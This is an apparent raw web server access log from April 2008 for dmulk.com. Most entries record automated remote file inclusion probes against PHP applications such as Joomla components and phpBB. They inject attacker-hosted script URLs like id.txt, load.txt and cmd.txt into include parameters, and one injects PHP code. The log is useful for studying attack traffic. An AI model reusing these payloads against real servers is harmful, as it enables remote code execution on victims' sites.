89.18.178.161 - - [07/Apr/2008:09:00:02 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:00:23 -0700] "HEAD /logs/access_080313.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
202.182.48.30 - - [07/Apr/2008:09:00:40 -0700] "GET /logs/access_080226.log HTTP/1.0" 200 837966 "http://www.bigsearcher.com/search/dt/plugins/payment/secpay/config.inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:45 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:46 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:46 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:54 -0700] "GET /logs/access_080211.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:55 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:00:56 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:01 -0700] "GET /logs/access_080211.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:02 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:02 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:07 -0700] "GET /logs/access_080211.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:08 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:09 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:09 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:10 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:11 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:01:23 -0700] "GET //pages.php?page=inurl:%22pages.php%22http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:01:27 -0700] "GET /logs//pages.php?page=inurl:%22pages.php%22http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:30 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:30 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:01:31 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:09:01:39 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:09:01:41 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [07/Apr/2008:09:01:42 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:09:01:45 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:02:09 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:02:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.56.123 - - [07/Apr/2008:09:02:13 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.61.13 - - [07/Apr/2008:09:02:43 -0700] "GET //plugins/spamx/EditIPofURL.Admin.class.php?_CONF%5Bpath%5D=http://freewebs.com/albcrew/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.61.13 - - [07/Apr/2008:09:02:47 -0700] "GET /logs//plugins/spamx/EditIPofURL.Admin.class.php?_CONF%5Bpath%5D=http://freewebs.com/albcrew/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.227.23.226 - - [07/Apr/2008:09:02:52 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.23.226 - - [07/Apr/2008:09:02:53 -0700] "GET /phphtml.php?htmlclass_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.23.226 - - [07/Apr/2008:09:02:53 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:03:14 -0700] "HEAD /logs/access_080124.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
212.174.24.65 - - [07/Apr/2008:09:03:29 -0700] "GET /http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.174.24.65 - - [07/Apr/2008:09:03:29 -0700] "GET /logs/http://www.cpjtechniek.nl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
62.141.56.36 - - [07/Apr/2008:09:03:32 -0700] "GET /logs/access_080329.log/index2.php?content=http://www.centrogassystem.com/includes/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [07/Apr/2008:09:03:32 -0700] "GET /index2.php?content=http://www.centrogassystem.com/includes/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [07/Apr/2008:09:03:33 -0700] "GET /logs/index2.php?content=http://www.centrogassystem.com/includes/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:09:03:41 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:03:47 -0700] "GET /logs/access_080220.log/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:04:09 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:04:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:04:17 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:04:18 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [07/Apr/2008:09:05:18 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.56.123 - - [07/Apr/2008:09:06:11 -0700] "GET /logs/access_080226.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.161.31.166 - - [07/Apr/2008:09:06:50 -0700] "HEAD /logs/access_080126.log HTTP/1.1" 200 0 "-" "Xenu Link Sleuth 1.2i" "dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:07:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:09:07:07 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
81.52.143.16 - - [07/Apr/2008:09:07:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:07:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:07:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.147.66 - - [07/Apr/2008:09:07:18 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.159.63.144 - - [07/Apr/2008:09:07:25 -0700] "GET /logs/access_080207.log/appserv/main.php?appserv_root=http://www.swe-frauen1.de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.159.63.144 - - [07/Apr/2008:09:07:25 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.swe-frauen1.de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.159.63.144 - - [07/Apr/2008:09:07:28 -0700] "GET /logs/access_080313.log/appserv/main.php?appserv_root=http://www.swe-frauen1.de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.52.143.16 - - [07/Apr/2008:09:07:30 -0700] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:09:07:56 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:09:07:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:09:07:59 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:09:05 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:09:06 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [07/Apr/2008:09:09:07 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:09:30 -0700] "GET /logs/access_080312.log//?pg=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.251.88 - - [07/Apr/2008:09:09:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:09:31 -0700] "GET /logs/access_080312.log//?pg=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:09:32 -0700] "GET /logs//?pg=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:09:33 -0700] "GET /logs//?pg=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 42127 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:09:50 -0700] "GET /logs/access_080201.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:09:51 -0700] "GET /logs/access_080201.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [07/Apr/2008:09:10:00 -0700] "GET /logs/access_080201.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:10:04 -0700] "GET /logs/access_080324.log//include/write.php?dir=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:10:04 -0700] "GET //include/write.php?dir=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:09:10:05 -0700] "GET /logs//include/write.php?dir=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:10:08 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:10:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.231 - - [07/Apr/2008:09:10:09 -0700] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:10:49 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:11:08 -0700] "GET /logs/access_080216.log/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.37 - - [07/Apr/2008:09:11:09 -0700] "GET /logs/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:11:45 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:11:45 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:11:48 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:11:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [07/Apr/2008:09:11:51 -0700] "GET /logs/access_080226.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fmotorsports.com/main/pnTemp/wget/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.51.146 - - [07/Apr/2008:09:12:23 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:09:12:42 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.111.204.40 - - [07/Apr/2008:09:12:54 -0700] "GET /senetman/html/index.php?page=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:13:13 -0700] "GET /logs/access_080219.log/[Scripthttp://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:13:14 -0700] "GET /[Scripthttp://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:09:13:15 -0700] "GET /logs/[Scripthttp://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.211.55 - - [07/Apr/2008:09:13:20 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:13:41 -0700] "GET /logs/access_070915.log HTTP/1.0" 200 65779 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:13:43 -0700] "GET /logs/access_080324.log/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:13:44 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:13:44 -0700] "GET /logs/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:09:13:45 -0700] "GET /logs/homepage.php?sel=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:09:13:46 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:14:19 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:09:14:19 -0700] "GET /logs/index.php?conteudo=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:14:20 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:09:14:20 -0700] "GET /index.php?conteudo=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:09:14:20 -0700] "GET /logs//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:14:40 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:14:43 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:09:14:43 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.101.53.2 - - [07/Apr/2008:09:14:47 -0700] "GET /logs/access_080215.log//administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.101.53.2 - - [07/Apr/2008:09:14:47 -0700] "GET //administrator/?mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.196.115 - - [07/Apr/2008:09:14:52 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donnyrovers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.196.115 - - [07/Apr/2008:09:14:52 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donnyrovers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.196.115 - - [07/Apr/2008:09:14:53 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donnyrovers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.196.115 - - [07/Apr/2008:09:15:00 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donnyrovers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:09:15:03 -0700] "GET /logs/access_080118.log//language/lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:09:15:03 -0700] "GET //language/lang_nl.php?temppath=http://www.suttas.com/files/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
